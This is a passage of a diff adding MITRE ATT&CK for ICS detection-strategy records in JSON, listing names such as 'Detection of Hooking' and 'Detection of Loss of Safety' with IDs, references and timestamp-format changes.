+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0798",
+                            "external_id": "DET0798"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Hardcoded Credentials",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--b337bf06-d69b-41e0-8e60-8f24cb718998"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.695000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--9f3df5ac-caa0-4189-9b9b-dcf2f6bbdc54",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.686000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0722",
+                            "external_id": "DET0722"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Hooking",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--05ca4f07-df4f-4e88-b216-f40ca6ce39b8"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.686000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--c94af5cb-61c3-4180-81e7-30c1669f4252",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.692000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0774",
+                            "external_id": "DET0774"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of I/O Image",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--c40ddd75-f2fc-4899-bda1-bff164c96622"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.692000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--e8b537e6-04eb-4168-a206-88cc041edf50",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.696000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0750",
+                            "external_id": "DET0750"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Indicator Removal on Host",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--55544bb8-440f-4b67-aa35-7e7af5952aca"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.696000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--ff6456fc-576d-4da5-b561-b58f70961b15",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-04-22 16:29:50.802000+00:00",
+                    "modified": "2026-05-12 16:30:18.391000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0905",
+                            "external_id": "DET0905"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Insecure Credentials",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--1017530e-423d-4857-80b6-99891bf82d28"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2026-04-22 16:29:50.802000+00:00\", \"old_value\": \"2026-04-22T16:29:50.802Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.391000+00:00\", \"old_value\": \"2026-04-24T20:30:16.130Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--c7aea5e8-cd8b-4f79-be41-3a446cdde7b7",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.692000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0796",
+                            "external_id": "DET0796"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Internet Accessible Device",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--87f5d864-d79b-474a-a3b4-43673dcb9f90"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.692000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--62587e44-0623-4b14-bd45-126430eaed4a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.679000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0745",
+                            "external_id": "DET0745"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Lateral Tool Transfer",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--930aae7c-e8f0-4594-8e3f-f0e71d7e1640"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.679000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--d9469edc-7e55-41bc-8b17-a8db9fc6302e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.694000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0729",
+                            "external_id": "DET0729"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Loss of Availability",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--8428e0cd-009e-41c1-8292-88651d4486c9"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.694000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--37b4971d-2eb8-4f87-899c-19acaf0394bb",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.674000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0778",
+                            "external_id": "DET0778"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Loss of Control",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--cbf791b4-5186-4205-ac5a-a56042aaebec"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.674000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--c7737640-99e8-4efb-90ee-39332b623b33",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.692000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0757",
+                            "external_id": "DET0757"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Loss of Productivity and Revenue",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--89ca8617-20fd-404b-9afb-dcfd2684a791"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.692000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--c4777f1a-1481-4e8a-a3f4-0da57418c808",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.692000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0775",
+                            "external_id": "DET0775"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Loss of Protection",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--29b6e4b8-878c-4139-aa56-7e1513714d34"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.692000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--fb0931d5-8eb9-4db2-a2a4-447c32b29bd4",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.698000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0779",
+                            "external_id": "DET0779"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Loss of Safety",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--8c77f31f-c6f4-491c-965a-e25c506b0c68"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.698000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--a995ba7c-c2c2-4d74-a3da-74e5a192099b",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.687000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0763",
+                            "external_id": "DET0763"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Loss of View",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--1e9c5d46-14e2-4efc-8861-e6dc942b3b9c"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.687000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--ad675d25-2829-48e5-8475-28f1ed5d813a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.688000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0773",
+                            "external_id": "DET0773"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Manipulate I/O Image",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--7841eb6b-8a05-4754-b738-a475bfbb89fb"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.688000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--ae24274b-0e20-451e-a883-6eeb0e8e7d00",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.688000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0747",
+                            "external_id": "DET0747"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Manipulation of Control",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--383a1a1c-8ecf-4909-9237-14a1f4fc4179"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.688000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--47c6f72c-1f2f-4ea8-94d0-08202b7d5bdb",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.676000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0785",
+                            "external_id": "DET0785"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Manipulation of View",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--d71e98fa-64d1-4ddb-acb1-bba1e4af6a73"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.676000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--06443942-ba28-4d13-b4b4-93317d6eafa5",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.667000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0725",
+                            "external_id": "DET0725"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Masquerading",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--791310ad-7db5-41df-9fa5-fa4097d8a51d"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.667000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--825106d1-6f44-47a1-b8dd-c3e3b6cecab7",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.683000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0777",
+                            "external_id": "DET0777"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Modify Alarm Settings",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--330166da-bc80-4aca-bd41-cbd6b1742812"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.683000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--fe11c904-752f-40e2-b269-c53bbb29541a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.698000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0741",
+                            "external_id": "DET0741"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection of Modify Controller Tasking",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--2195ec67-7cea-4b0d-a678-18384089bf2c"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "ics-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
